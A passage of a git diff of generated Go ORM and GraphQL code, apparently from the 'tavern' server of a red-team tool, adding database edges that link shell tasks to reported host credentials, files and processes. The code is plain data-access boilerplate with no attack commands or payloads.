err != nil { + return nil, err + } + } + for name, query := range stq.withNamedReportedFiles { + if err := stq.loadReportedFiles(ctx, query, nodes, + func(n *ShellTask) { n.appendNamedReportedFiles(name) }, + func(n *ShellTask, e *HostFile) { n.appendNamedReportedFiles(name, e) }); err != nil { + return nil, err + } + } + for name, query := range stq.withNamedReportedProcesses { + if err := stq.loadReportedProcesses(ctx, query, nodes, + func(n *ShellTask) { n.appendNamedReportedProcesses(name) }, + func(n *ShellTask, e *HostProcess) { n.appendNamedReportedProcesses(name, e) }); err != nil { + return nil, err + } + } for i := range stq.loadTotal { if err := stq.loadTotal[i](ctx, nodes); err != nil { return nil, err @@ -526,6 +685,99 @@ func (stq *ShellTaskQuery) loadCreator(ctx context.Context, query *UserQuery, no } return nil } +func (stq *ShellTaskQuery) loadReportedCredentials(ctx context.Context, query *HostCredentialQuery, nodes []*ShellTask, init func(*ShellTask), assign func(*ShellTask, *HostCredential)) error { + fks := make([]driver.Value, 0, len(nodes)) + nodeids := make(map[int]*ShellTask) + for i := range nodes { + fks = append(fks, nodes[i].ID) + nodeids[nodes[i].ID] = nodes[i] + if init != nil { + init(nodes[i]) + } + } + query.withFKs = true + query.Where(predicate.HostCredential(func(s *sql.Selector) { + s.Where(sql.InValues(s.C(shelltask.ReportedCredentialsColumn), fks...)) + })) + neighbors, err := query.All(ctx) + if err != nil { + return err + } + for _, n := range neighbors { + fk := n.shell_task_reported_credentials + if fk == nil { + return fmt.Errorf(`foreign-key "shell_task_reported_credentials" is nil for node %v`, n.ID) + } + node, ok := nodeids[*fk] + if !ok { + return fmt.Errorf(`unexpected referenced foreign-key "shell_task_reported_credentials" returned %v for node %v`, *fk, n.ID) + } + assign(node, n) + } + return nil +} +func (stq *ShellTaskQuery) loadReportedFiles(ctx context.Context, query *HostFileQuery, nodes []*ShellTask, init func(*ShellTask), assign func(*ShellTask, *HostFile)) error { + fks := make([]driver.Value, 0, len(nodes)) + nodeids := make(map[int]*ShellTask) + for i := range nodes { + fks = append(fks, nodes[i].ID) + nodeids[nodes[i].ID] = nodes[i] + if init != nil { + init(nodes[i]) + } + } + query.withFKs = true + query.Where(predicate.HostFile(func(s *sql.Selector) { + s.Where(sql.InValues(s.C(shelltask.ReportedFilesColumn), fks...)) + })) + neighbors, err := query.All(ctx) + if err != nil { + return err + } + for _, n := range neighbors { + fk := n.shell_task_reported_files + if fk == nil { + return fmt.Errorf(`foreign-key "shell_task_reported_files" is nil for node %v`, n.ID) + } + node, ok := nodeids[*fk] + if !ok { + return fmt.Errorf(`unexpected referenced foreign-key "shell_task_reported_files" returned %v for node %v`, *fk, n.ID) + } + assign(node, n) + } + return nil +} +func (stq *ShellTaskQuery) loadReportedProcesses(ctx context.Context, query *HostProcessQuery, nodes []*ShellTask, init func(*ShellTask), assign func(*ShellTask, *HostProcess)) error { + fks := make([]driver.Value, 0, len(nodes)) + nodeids := make(map[int]*ShellTask) + for i := range nodes { + fks = append(fks, nodes[i].ID) + nodeids[nodes[i].ID] = nodes[i] + if init != nil { + init(nodes[i]) + } + } + query.withFKs = true + query.Where(predicate.HostProcess(func(s *sql.Selector) { + s.Where(sql.InValues(s.C(shelltask.ReportedProcessesColumn), fks...)) + })) + neighbors, err := query.All(ctx) + if err != nil { + return err + } + for _, n := range neighbors { + fk := n.shell_task_reported_processes + if fk == nil { + return fmt.Errorf(`foreign-key "shell_task_reported_processes" is nil for node %v`, n.ID) + } + node, ok := nodeids[*fk] + if !ok { + return fmt.Errorf(`unexpected referenced foreign-key "shell_task_reported_processes" returned %v for node %v`, *fk, n.ID) + } + assign(node, n) + } + return nil +} func (stq *ShellTaskQuery) sqlCount(ctx context.Context) (int, error) { _spec := stq.querySpec() @@ -611,6 +863,48 @@ func (stq *ShellTaskQuery) sqlQuery(ctx context.Context) *sql.Selector { return selector } +// WithNamedReportedCredentials tells the query-builder to eager-load the nodes that are connected to the "reported_credentials" +// edge with the given name. The optional arguments are used to configure the query builder of the edge. +func (stq *ShellTaskQuery) WithNamedReportedCredentials(name string, opts ...func(*HostCredentialQuery)) *ShellTaskQuery { + query := (&HostCredentialClient{config: stq.config}).Query() + for _, opt := range opts { + opt(query) + } + if stq.withNamedReportedCredentials == nil { + stq.withNamedReportedCredentials = make(map[string]*HostCredentialQuery) + } + stq.withNamedReportedCredentials[name] = query + return stq +} + +// WithNamedReportedFiles tells the query-builder to eager-load the nodes that are connected to the "reported_files" +// edge with the given name. The optional arguments are used to configure the query builder of the edge. +func (stq *ShellTaskQuery) WithNamedReportedFiles(name string, opts ...func(*HostFileQuery)) *ShellTaskQuery { + query := (&HostFileClient{config: stq.config}).Query() + for _, opt := range opts { + opt(query) + } + if stq.withNamedReportedFiles == nil { + stq.withNamedReportedFiles = make(map[string]*HostFileQuery) + } + stq.withNamedReportedFiles[name] = query + return stq +} + +// WithNamedReportedProcesses tells the query-builder to eager-load the nodes that are connected to the "reported_processes" +// edge with the given name. The optional arguments are used to configure the query builder of the edge. +func (stq *ShellTaskQuery) WithNamedReportedProcesses(name string, opts ...func(*HostProcessQuery)) *ShellTaskQuery { + query := (&HostProcessClient{config: stq.config}).Query() + for _, opt := range opts { + opt(query) + } + if stq.withNamedReportedProcesses == nil { + stq.withNamedReportedProcesses = make(map[string]*HostProcessQuery) + } + stq.withNamedReportedProcesses[name] = query + return stq +} + // ShellTaskGroupBy is the group-by builder for ShellTask entities. type ShellTaskGroupBy struct { selector diff --git a/tavern/internal/ent/shelltask_update.go b/tavern/internal/ent/shelltask_update.go index a434a1914..d5203b7bd 100644 --- a/tavern/internal/ent/shelltask_update.go +++ b/tavern/internal/ent/shelltask_update.go @@ -11,6 +11,9 @@ import ( "entgo.io/ent/dialect/sql" "entgo.io/ent/dialect/sql/sqlgraph" "entgo.io/ent/schema/field" + "realm.pub/tavern/internal/ent/hostcredential" + "realm.pub/tavern/internal/ent/hostfile" + "realm.pub/tavern/internal/ent/hostprocess" "realm.pub/tavern/internal/ent/predicate" "realm.pub/tavern/internal/ent/shell" "realm.pub/tavern/internal/ent/shelltask" @@ -207,6 +210,51 @@ func (stu *ShellTaskUpdate) SetCreator(u *User) *ShellTaskUpdate { return stu.SetCreatorID(u.ID) } +// AddReportedCredentialIDs adds the "reported_credentials" edge to the HostCredential entity by IDs. +func (stu *ShellTaskUpdate) AddReportedCredentialIDs(ids ...int) *ShellTaskUpdate { + stu.mutation.AddReportedCredentialIDs(ids...) + return stu +} + +// AddReportedCredentials adds the "reported_credentials" edges to the HostCredential entity. +func (stu *ShellTaskUpdate) AddReportedCredentials(h ...*HostCredential) *ShellTaskUpdate { + ids := make([]int, len(h)) + for i := range h { + ids[i] = h[i].ID + } + return stu.AddReportedCredentialIDs(ids...) +} + +// AddReportedFileIDs adds the "reported_files" edge to the HostFile entity by IDs. +func (stu *ShellTaskUpdate) AddReportedFileIDs(ids ...int) *ShellTaskUpdate { + stu.mutation.AddReportedFileIDs(ids...) + return stu +} + +// AddReportedFiles adds the "reported_files" edges to the HostFile entity. +func (stu *ShellTaskUpdate) AddReportedFiles(h ...*HostFile) *ShellTaskUpdate { + ids := make([]int, len(h)) + for i := range h { + ids[i] = h[i].ID + } + return stu.AddReportedFileIDs(ids...) +} + +// AddReportedProcessIDs adds the "reported_processes" edge to the HostProcess entity by IDs. +func (stu *ShellTaskUpdate) AddReportedProcessIDs(ids ...int) *ShellTaskUpdate { + stu.mutation.AddReportedProcessIDs(ids...) + return stu +} + +// AddReportedProcesses adds the "reported_processes" edges to the HostProcess entity. +func (stu *ShellTaskUpdate) AddReportedProcesses(h ...*HostProcess) *ShellTaskUpdate { + ids := make([]int, len(h)) + for i := range h { + ids[i] = h[i].ID + } + return stu.AddReportedProcessIDs(ids...) +} + // Mutation returns the ShellTaskMutation object of the builder. func (stu *ShellTaskUpdate) Mutation() *ShellTaskMutation { return stu.mutation @@ -224,6 +272,69 @@ func (stu *ShellTaskUpdate) ClearCreator() *ShellTaskUpdate { return stu } +// ClearReportedCredentials clears all "reported_credentials" edges to the HostCredential entity. +func (stu *ShellTaskUpdate) ClearReportedCredentials() *ShellTaskUpdate { + stu.mutation.ClearReportedCredentials() + return stu +} + +// RemoveReportedCredentialIDs removes the "reported_credentials" edge to HostCredential entities by IDs. +func (stu *ShellTaskUpdate) RemoveReportedCredentialIDs(ids ...int) *ShellTaskUpdate { + stu.mutation.RemoveReportedCredentialIDs(ids...) + return stu +} + +// RemoveReportedCredentials removes "reported_credentials" edges to HostCredential entities. +func (stu *ShellTaskUpdate) RemoveReportedCredentials(h ...*HostCredential) *ShellTaskUpdate { + ids := make([]int, len(h)) + for i := range h { + ids[i] = h[i].ID + } + return stu.RemoveReportedCredentialIDs(ids...) +} + +// ClearReportedFiles clears all "reported_files" edges to the HostFile entity. +func (stu *ShellTaskUpdate) ClearReportedFiles() *ShellTaskUpdate { + stu.mutation.ClearReportedFiles() + return stu +} + +// RemoveReportedFileIDs removes the "reported_files" edge to HostFile entities by IDs. +func (stu *ShellTaskUpdate) RemoveReportedFileIDs(ids ...int) *ShellTaskUpdate { + stu.mutation.RemoveReportedFileIDs(ids...) + return stu +} + +// RemoveReportedFiles removes "reported_files" edges to HostFile entities. +func (stu *ShellTaskUpdate) RemoveReportedFiles(h ...*HostFile) *ShellTaskUpdate { + ids := make([]int, len(h)) + for i := range h { + ids[i] = h[i].ID + } + return stu.RemoveReportedFileIDs(ids...) +} + +// ClearReportedProcesses clears all "reported_processes" edges to the HostProcess entity. +func (stu *ShellTaskUpdate) ClearReportedProcesses() *ShellTaskUpdate { + stu.mutation.ClearReportedProcesses() + return stu +} + +// RemoveReportedProcessIDs removes the "reported_processes" edge to HostProcess entities by IDs. +func (stu *ShellTaskUpdate) RemoveReportedProcessIDs(ids ...int) *ShellTaskUpdate { + stu.mutation.RemoveReportedProcessIDs(ids...) + return stu +} + +// RemoveReportedProcesses removes "reported_processes" edges to HostProcess entities. +func (stu *ShellTaskUpdate) RemoveReportedProcesses(h ...*HostProcess) *ShellTaskUpdate { + ids := make([]int, len(h)) + for i := range h { + ids[i] = h[i].ID + } + return stu.RemoveReportedProcessIDs(ids...) +} + // Save executes the query and returns the number of nodes affected by the update operation. func (stu *ShellTaskUpdate) Save(ctx context.Context) (int, error) { stu.defaults() @@ -386,6 +497,141 @@ func (stu *ShellTaskUpdate) sqlSave(ctx context.Context) (n int, err error) { } _spec.Edges.Add = append(_spec.Edges.Add, edge) } + if stu.mutation.ReportedCredentialsCleared() { + edge := &sqlgraph.EdgeSpec{ + Rel: sqlgraph.O2M, + Inverse: false, + Table: shelltask.ReportedCredentialsTable, + Columns: []string{shelltask.ReportedCredentialsColumn}, + Bidi: false, + Target: &sqlgraph.EdgeTarget{ + IDSpec: sqlgraph.NewFieldSpec(hostcredential.FieldID, field.TypeInt), + }, + } + _spec.Edges.Clear = append(_spec.Edges.Clear, edge) + } + if nodes := stu.mutation.RemovedReportedCredentialsIDs(); len(nodes) > 0 && !stu.mutation.ReportedCredentialsCleared() { + edge := &sqlgraph.EdgeSpec{ + Rel: sqlgraph.O2M, + Inverse: false, + Table: shelltask.ReportedCredentialsTable, + Columns: []string{shelltask.ReportedCredentialsColumn}, + Bidi: false, + Target: &sqlgraph.EdgeTarget{ + IDSpec: sqlgraph.NewFieldSpec(hostcredential.FieldID, field.TypeInt), + }, + } + for _, k := range nodes { + edge.Target.Nodes = append(edge.Target.Nodes, k) + } + _spec.Edges.Clear = append(_spec.Edges.Clear, edge) + } + if nodes := stu.mutation.ReportedCredentialsIDs(); len(nodes) > 0 { + edge := &sqlgraph.EdgeSpec{ + Rel: sqlgraph.O2M, + Inverse: false, + Table: shelltask.ReportedCredentialsTable, + Columns: []string{shelltask.ReportedCredentialsColumn}, + Bidi: false, + Target: &sqlgraph.EdgeTarget{ + IDSpec: sqlgraph.NewFieldSpec(hostcredential.FieldID, field.TypeInt), + }, + } + for _, k := range nodes { + edge.Target.Nodes = append(edge.Target.Nodes, k) + } + _spec.Edges.Add = append(_spec.Edges.Add, edge) + } + if stu.mutation.ReportedFilesCleared() { + edge := &sqlgraph.EdgeSpec{ + Rel: sqlgraph.O2M, + Inverse: false, + Table: shelltask.ReportedFilesTable, + Columns: []string{shelltask.ReportedFilesColumn}, + Bidi: false, + Target: &sqlgraph.EdgeTarget{ + IDSpec: sqlgraph.NewFieldSpec(hostfile.FieldID, field.TypeInt), + }, + } + _spec.Edges.Clear = append(_spec.Edges.Clear, edge) + } + if nodes := stu.mutation.RemovedReportedFilesIDs(); len(nodes) > 0 && !stu.mutation.ReportedFilesCleared() { + edge := &sqlgraph.EdgeSpec{ + Rel: sqlgraph.O2M, + Inverse: false, + Table: shelltask.ReportedFilesTable, + Columns: []string{shelltask.ReportedFilesColumn}, + Bidi: false, + Target: &sqlgraph.EdgeTarget{ + IDSpec: sqlgraph.NewFieldSpec(hostfile.FieldID, field.TypeInt), + }, + } + for _, k := range nodes { + edge.Target.Nodes = append(edge.Target.Nodes, k) + } + _spec.Edges.Clear = append(_spec.Edges.Clear, edge) + } + if nodes := stu.mutation.ReportedFilesIDs(); len(nodes) > 0 { + edge := &sqlgraph.EdgeSpec{ + Rel: sqlgraph.O2M, + Inverse: false, + Table: shelltask.ReportedFilesTable, + Columns: []string{shelltask.ReportedFilesColumn}, + Bidi: false, + Target: &sqlgraph.EdgeTarget{ + IDSpec: sqlgraph.NewFieldSpec(hostfile.FieldID, field.TypeInt), + }, + } + for _, k := range nodes { + edge.Target.Nodes = append(edge.Target.Nodes, k) + } + _spec.Edges.Add = append(_spec.Edges.Add, edge) + } + if stu.mutation.ReportedProcessesCleared() { + edge := &sqlgraph.EdgeSpec{ + Rel: sqlgraph.O2M, + Inverse: false, + Table: shelltask.ReportedProcessesTable, + Columns: []string{shelltask.ReportedProcessesColumn}, + Bidi: false, + Target: &sqlgraph.EdgeTarget{ + IDSpec: sqlgraph.NewFieldSpec(hostprocess.FieldID, field.TypeInt), + }, + } + _spec.Edges.Clear = append(_spec.Edges.Clear, edge) + } + if nodes := stu.mutation.RemovedReportedProcessesIDs(); len(nodes) > 0 && !stu.mutation.ReportedProcessesCleared() { + edge := &sqlgraph.EdgeSpec{ + Rel: sqlgraph.O2M, + Inverse: false, + Table: shelltask.ReportedProcessesTable, + Columns: []string{shelltask.ReportedProcessesColumn}, + Bidi: false, + Target: &sqlgraph.EdgeTarget{ + IDSpec: sqlgraph.NewFieldSpec(hostprocess.FieldID, field.TypeInt), + }, + } + for _, k := range nodes { + edge.Target.Nodes = append(edge.Target.Nodes, k) + } + _spec.Edges.Clear = append(_spec.Edges.Clear, edge) + } + if nodes := stu.mutation.ReportedProcessesIDs(); len(nodes) > 0 { + edge := &sqlgraph.EdgeSpec{ + Rel: sqlgraph.O2M, + Inverse: false, + Table: shelltask.ReportedProcessesTable, + Columns: []string{shelltask.ReportedProcessesColumn}, + Bidi: false, + Target: &sqlgraph.EdgeTarget{ + IDSpec: sqlgraph.NewFieldSpec(hostprocess.FieldID, field.TypeInt), + }, + } + for _, k := range nodes { + edge.Target.Nodes = append(edge.Target.Nodes, k) + } + _spec.Edges.Add = append(_spec.Edges.Add, edge) + } if n, err = sqlgraph.UpdateNodes(ctx, stu.driver, _spec); err != nil { if _, ok := err.(*sqlgraph.NotFoundError); ok { err = &NotFoundError{shelltask.Label} @@ -583,6 +829,51 @@ func (stuo *ShellTaskUpdateOne) SetCreator(u *User) *ShellTaskUpdateOne { return stuo.SetCreatorID(u.ID) } +// AddReportedCredentialIDs adds the "reported_credentials" edge to the HostCredential entity by IDs. +func (stuo *ShellTaskUpdateOne) AddReportedCredentialIDs(ids ...int) *ShellTaskUpdateOne { + stuo.mutation.AddReportedCredentialIDs(ids...) + return stuo +} + +// AddReportedCredentials adds the "reported_credentials" edges to the HostCredential entity. +func (stuo *ShellTaskUpdateOne) AddReportedCredentials(h ...*HostCredential) *ShellTaskUpdateOne { + ids := make([]int, len(h)) + for i := range h { + ids[i] = h[i].ID + } + return stuo.AddReportedCredentialIDs(ids...) +} + +// AddReportedFileIDs adds the "reported_files" edge to the HostFile entity by IDs. +func (stuo *ShellTaskUpdateOne) AddReportedFileIDs(ids ...int) *ShellTaskUpdateOne { + stuo.mutation.AddReportedFileIDs(ids...) + return stuo +} + +// AddReportedFiles adds the "reported_files" edges to the HostFile entity. +func (stuo *ShellTaskUpdateOne) AddReportedFiles(h ...*HostFile) *ShellTaskUpdateOne { + ids := make([]int, len(h)) + for i := range h { + ids[i] = h[i].ID + } + return stuo.AddReportedFileIDs(ids...) +} + +// AddReportedProcessIDs adds the "reported_processes" edge to the HostProcess entity by IDs. +func (stuo *ShellTaskUpdateOne) AddReportedProcessIDs(ids ...int) *ShellTaskUpdateOne { + stuo.mutation.AddReportedProcessIDs(ids...) + return stuo +} + +// AddReportedProcesses adds the "reported_processes" edges to the HostProcess entity. +func (stuo *ShellTaskUpdateOne) AddReportedProcesses(h ...*HostProcess) *ShellTaskUpdateOne { + ids := make([]int, len(h)) + for i := range h { + ids[i] = h[i].ID + } + return stuo.AddReportedProcessIDs(ids...) +} + // Mutation returns the ShellTaskMutation object of the builder. func (stuo *ShellTaskUpdateOne) Mutation() *ShellTaskMutation { return stuo.mutation @@ -600,6 +891,69 @@ func (stuo *ShellTaskUpdateOne) ClearCreator() *ShellTaskUpdateOne { return stuo } +// ClearReportedCredentials clears all "reported_credentials" edges to the HostCredential entity. +func (stuo *ShellTaskUpdateOne) ClearReportedCredentials() *ShellTaskUpdateOne { + stuo.mutation.ClearReportedCredentials() + return stuo +} + +// RemoveReportedCredentialIDs removes the "reported_credentials" edge to HostCredential entities by IDs. +func (stuo *ShellTaskUpdateOne) RemoveReportedCredentialIDs(ids ...int) *ShellTaskUpdateOne { + stuo.mutation.RemoveReportedCredentialIDs(ids...) + return stuo +} + +// RemoveReportedCredentials removes "reported_credentials" edges to HostCredential entities. +func (stuo *ShellTaskUpdateOne) RemoveReportedCredentials(h ...*HostCredential) *ShellTaskUpdateOne { + ids := make([]int, len(h)) + for i := range h { + ids[i] = h[i].ID + } + return stuo.RemoveReportedCredentialIDs(ids...) +} + +// ClearReportedFiles clears all "reported_files" edges to the HostFile entity. +func (stuo *ShellTaskUpdateOne) ClearReportedFiles() *ShellTaskUpdateOne { + stuo.mutation.ClearReportedFiles() + return stuo +} + +// RemoveReportedFileIDs removes the "reported_files" edge to HostFile entities by IDs. +func (stuo *ShellTaskUpdateOne) RemoveReportedFileIDs(ids ...int) *ShellTaskUpdateOne { + stuo.mutation.RemoveReportedFileIDs(ids...) + return stuo +} + +// RemoveReportedFiles removes "reported_files" edges to HostFile entities. +func (stuo *ShellTaskUpdateOne) RemoveReportedFiles(h ...*HostFile) *ShellTaskUpdateOne { + ids := make([]int, len(h)) + for i := range h { + ids[i] = h[i].ID + } + return stuo.RemoveReportedFileIDs(ids...) +} + +// ClearReportedProcesses clears all "reported_processes" edges to the HostProcess entity. +func (stuo *ShellTaskUpdateOne) ClearReportedProcesses() *ShellTaskUpdateOne { + stuo.mutation.ClearReportedProcesses() + return stuo +} + +// RemoveReportedProcessIDs removes the "reported_processes" edge to HostProcess entities by IDs. +func (stuo *ShellTaskUpdateOne) RemoveReportedProcessIDs(ids ...int) *ShellTaskUpdateOne { + stuo.mutation.RemoveReportedProcessIDs(ids...) + return stuo +} + +// RemoveReportedProcesses removes "reported_processes" edges to HostProcess entities. +func (stuo *ShellTaskUpdateOne) RemoveReportedProcesses(h ...*HostProcess) *ShellTaskUpdateOne { + ids := make([]int, len(h)) + for i := range h { + ids[i] = h[i].ID + } + return stuo.RemoveReportedProcessIDs(ids...) +} + // Where appends a list predicates to the ShellTaskUpdate builder. func (stuo *ShellTaskUpdateOne) Where(ps ...predicate.ShellTask) *ShellTaskUpdateOne { stuo.mutation.Where(ps...) @@ -792,6 +1146,141 @@ func (stuo *ShellTaskUpdateOne) sqlSave(ctx context.Context) (_node *ShellTask, } _spec.Edges.Add = append(_spec.Edges.Add, edge) } + if stuo.mutation.ReportedCredentialsCleared() { + edge := &sqlgraph.EdgeSpec{ + Rel: sqlgraph.O2M, + Inverse: false, + Table: shelltask.ReportedCredentialsTable, + Columns: []string{shelltask.ReportedCredentialsColumn}, + Bidi: false, + Target: &sqlgraph.EdgeTarget{ + IDSpec: sqlgraph.NewFieldSpec(hostcredential.FieldID, field.TypeInt), + }, + } + _spec.Edges.Clear = append(_spec.Edges.Clear, edge) + } + if nodes := stuo.mutation.RemovedReportedCredentialsIDs(); len(nodes) > 0 && !stuo.mutation.ReportedCredentialsCleared() { + edge := &sqlgraph.EdgeSpec{ + Rel: sqlgraph.O2M, + Inverse: false, + Table: shelltask.ReportedCredentialsTable, + Columns: []string{shelltask.ReportedCredentialsColumn}, + Bidi: false, + Target: &sqlgraph.EdgeTarget{ + IDSpec: sqlgraph.NewFieldSpec(hostcredential.FieldID, field.TypeInt), + }, + } + for _, k := range nodes { + edge.Target.Nodes = append(edge.Target.Nodes, k) + } + _spec.Edges.Clear = append(_spec.Edges.Clear, edge) + } + if nodes := stuo.mutation.ReportedCredentialsIDs(); len(nodes) > 0 { + edge := &sqlgraph.EdgeSpec{ + Rel: sqlgraph.O2M, + Inverse: false, + Table: shelltask.ReportedCredentialsTable, + Columns: []string{shelltask.ReportedCredentialsColumn}, + Bidi: false, + Target: &sqlgraph.EdgeTarget{ + IDSpec: sqlgraph.NewFieldSpec(hostcredential.FieldID, field.TypeInt), + }, + } + for _, k := range nodes { + edge.Target.Nodes = append(edge.Target.Nodes, k) + } + _spec.Edges.Add = append(_spec.Edges.Add, edge) + } + if stuo.mutation.ReportedFilesCleared() { + edge := &sqlgraph.EdgeSpec{ + Rel: sqlgraph.O2M, + Inverse: false, + Table: shelltask.ReportedFilesTable, + Columns: []string{shelltask.ReportedFilesColumn}, + Bidi: false, + Target: &sqlgraph.EdgeTarget{ + IDSpec: sqlgraph.NewFieldSpec(hostfile.FieldID, field.TypeInt), + }, + } + _spec.Edges.Clear = append(_spec.Edges.Clear, edge) + } + if nodes := stuo.mutation.RemovedReportedFilesIDs(); len(nodes) > 0 && !stuo.mutation.ReportedFilesCleared() { + edge := &sqlgraph.EdgeSpec{ + Rel: sqlgraph.O2M, + Inverse: false, + Table: shelltask.ReportedFilesTable, + Columns: []string{shelltask.ReportedFilesColumn}, + Bidi: false, + Target: &sqlgraph.EdgeTarget{ + IDSpec: sqlgraph.NewFieldSpec(hostfile.FieldID, field.TypeInt), + }, + } + for _, k := range nodes { + edge.Target.Nodes = append(edge.Target.Nodes, k) + } + _spec.Edges.Clear = append(_spec.Edges.Clear, edge) + } + if nodes := stuo.mutation.ReportedFilesIDs(); len(nodes) > 0 { + edge := &sqlgraph.EdgeSpec{ + Rel: sqlgraph.O2M, + Inverse: false, + Table: shelltask.ReportedFilesTable, + Columns: []string{shelltask.ReportedFilesColumn}, + Bidi: false, + Target: &sqlgraph.EdgeTarget{ + IDSpec: sqlgraph.NewFieldSpec(hostfile.FieldID, field.TypeInt), + }, + } + for _, k := range nodes { + edge.Target.Nodes = append(edge.Target.Nodes, k) + } + _spec.Edges.Add = append(_spec.Edges.Add, edge) + } + if stuo.mutation.ReportedProcessesCleared() { + edge := &sqlgraph.EdgeSpec{ + Rel: sqlgraph.O2M, + Inverse: false, + Table: shelltask.ReportedProcessesTable, + Columns: []string{shelltask.ReportedProcessesColumn}, + Bidi: false, + Target: &sqlgraph.EdgeTarget{ + IDSpec: sqlgraph.NewFieldSpec(hostprocess.FieldID, field.TypeInt), + }, + } + _spec.Edges.Clear = append(_spec.Edges.Clear, edge) + } + if nodes := stuo.mutation.RemovedReportedProcessesIDs(); len(nodes) > 0 && !stuo.mutation.ReportedProcessesCleared() { + edge := &sqlgraph.EdgeSpec{ + Rel: sqlgraph.O2M, + Inverse: false, + Table: shelltask.ReportedProcessesTable, + Columns: []string{shelltask.ReportedProcessesColumn}, + Bidi: false, + Target: &sqlgraph.EdgeTarget{ + IDSpec: sqlgraph.NewFieldSpec(hostprocess.FieldID, field.TypeInt), + }, + } + for _, k := range nodes { + edge.Target.Nodes = append(edge.Target.Nodes, k) + } + _spec.Edges.Clear = append(_spec.Edges.Clear, edge) + } + if nodes := stuo.mutation.ReportedProcessesIDs(); len(nodes) > 0 { + edge := &sqlgraph.EdgeSpec{ + Rel: sqlgraph.O2M, + Inverse: false, + Table: shelltask.ReportedProcessesTable, + Columns: []string{shelltask.ReportedProcessesColumn}, + Bidi: false, + Target: &sqlgraph.EdgeTarget{ + IDSpec: sqlgraph.NewFieldSpec(hostprocess.FieldID, field.TypeInt), + }, + } + for _, k := range nodes { + edge.Target.Nodes = append(edge.Target.Nodes, k) + } + _spec.Edges.Add = append(_spec.Edges.Add, edge) + } _node = &ShellTask{config: stuo.config} _spec.Assign = _node.assignValues _spec.ScanValues = _node.scanValues diff --git a/tavern/internal/graphql/generated/ent.generated.go b/tavern/internal/graphql/generated/ent.generated.go index 8c6f5ed04..23363953a 100644 --- a/tavern/internal/graphql/generated/ent.generated.go +++ b/tavern/internal/graphql/generated/ent.generated.go @@ -4765,6 +4765,69 @@ func (ec *executionContext) fieldContext_HostCredential_task(_ context.Context, return fc, nil } +func (ec *executionContext) _HostCredential_shellTask(ctx context.Context, field graphql.CollectedField, obj *ent.HostCredential) (ret graphql.Marshaler) { + return graphql.ResolveField( + ctx, + ec.OperationContext, + field, + ec.fieldContext_HostCredential_shellTask, + func(ctx context.Context) (any, error) { + return obj.ShellTask(ctx) + }, + nil, + ec.marshalOShellTask2ᚖrealmᚗpubᚋtavernᚋinternalᚋentᚐShellTask, + true, + false, + ) +} + +func (ec *executionContext) fieldContext_HostCredential_shellTask(_ context.Context, field graphql.CollectedField) (fc *graphql.FieldContext, err error) { + fc = &graphql.FieldContext{ + Object: "HostCredential", + Field: field, + IsMethod: true, + IsResolver: false, + Child: func(ctx context.Context, field graphql.CollectedField) (*graphql.FieldContext, error) { + switch field.Name { + case "id": + return ec.fieldContext_ShellTask_id(ctx, field) + case "createdAt": + return ec.fieldContext_ShellTask_createdAt(ctx, field) + case "lastModifiedAt": + return ec.fieldContext_ShellTask_lastModifiedAt(ctx, field) + case "input": + return ec.fieldContext_ShellTask_input(ctx, field) + case "output": + return ec.fieldContext_ShellTask_output(ctx, field) + case "error": + return ec.fieldContext_ShellTask_error(ctx, field) + case "streamID": + return ec.fieldContext_ShellTask_streamID(ctx, field) + case "sequenceID": + return ec.fieldContext_ShellTask_sequenceID(ctx, field) + case "claimedAt": + return ec.fieldContext_ShellTask_claimedAt(ctx, field) + case "execStartedAt": + return ec.fieldContext_ShellTask_execStartedAt(ctx, field) + case "execFinishedAt": + return ec.fieldContext_ShellTask_execFinishedAt(ctx, field) + case "shell": + return ec.fieldContext_ShellTask_shell(ctx, field) + case "creator": + return ec.fieldContext_ShellTask_creator(ctx, field) + case "reportedCredentials": + return ec.fieldContext_ShellTask_reportedCredentials(ctx, field) + case "reportedFiles": + return ec.fieldContext_ShellTask_reportedFiles(ctx, field) + case "reportedProcesses": + return ec.fieldContext_ShellTask_reportedProcesses(ctx, field) + } + return nil, fmt.Errorf("no field named %q was found under type ShellTask", field.Name) + }, + } + return fc, nil +} + func (ec *executionContext) _HostCredentialConnection_edges(ctx context.Context, field graphql.CollectedField, obj *ent.HostCredentialConnection) (ret graphql.Marshaler) { return graphql.ResolveField( ctx, @@ -4908,6 +4971,8 @@ func (ec *executionContext) fieldContext_HostCredentialEdge_node(_ context.Conte return ec.fieldContext_HostCredential_host(ctx, field) case "task": return ec.fieldContext_HostCredential_task(ctx, field) + case "shellTask": + return ec.fieldContext_HostCredential_shellTask(ctx, field) } return nil, fmt.Errorf("no field named %q was found under type HostCredential", field.Name) }, @@ -5366,9 +5431,9 @@ func (ec *executionContext) _HostFile_task(ctx context.Context, field graphql.Co return obj.Task(ctx) }, nil, - ec.marshalNTask2ᚖrealmᚗpubᚋtavernᚋinternalᚋentᚐTask, - true, + ec.marshalOTask2ᚖrealmᚗpubᚋtavernᚋinternalᚋentᚐTask, true, + false, ) } @@ -5417,6 +5482,69 @@ func (ec *executionContext) fieldContext_HostFile_task(_ context.Context, field return fc, nil } +func (ec *executionContext) _HostFile_shellTask(ctx context.Context, field graphql.CollectedField, obj *ent.HostFile) (ret graphql.Marshaler) { + return graphql.ResolveField( + ctx, + ec.OperationContext, + field, + ec.fieldContext_HostFile_shellTask, + func(ctx context.Context) (any, error) { + return obj.ShellTask(ctx) + }, + nil, + ec.marshalOShellTask2ᚖrealmᚗpubᚋtavernᚋinternalᚋentᚐShellTask, + true, + false, + ) +} + +func (ec *executionContext) fieldContext_HostFile_shellTask(_ context.Context, field graphql.CollectedField) (fc *graphql.FieldContext, err error) { + fc = &graphql.FieldContext{ + Object: "HostFile", + Field: field, + IsMethod: true, + IsResolver: false, + Child: func(ctx context.Context, field graphql.CollectedField) (*graphql.FieldContext, error) { + switch field.Name { + case "id": + return ec.fieldContext_ShellTask_id(ctx, field) + case "createdAt": + return ec.fieldContext_ShellTask_createdAt(ctx, field) + case "lastModifiedAt": + return ec.fieldContext_ShellTask_lastModifiedAt(ctx, field) + case "input": + return ec.fieldContext_ShellTask_input(ctx, field) + case "output": + return ec.fieldContext_ShellTask_output(ctx, field) + case "error": + return ec.fieldContext_ShellTask_error(ctx, field) + case "streamID": + return ec.fieldContext_ShellTask_streamID(ctx, field) + case "sequenceID": + return ec.fieldContext_ShellTask_sequenceID(ctx, field) + case "claimedAt": + return ec.fieldContext_ShellTask_claimedAt(ctx, field) + case "execStartedAt": + return ec.fieldContext_ShellTask_execStartedAt(ctx, field) + case "execFinishedAt": + return ec.fieldContext_ShellTask_execFinishedAt(ctx, field) + case "shell": + return ec.fieldContext_ShellTask_shell(ctx, field) + 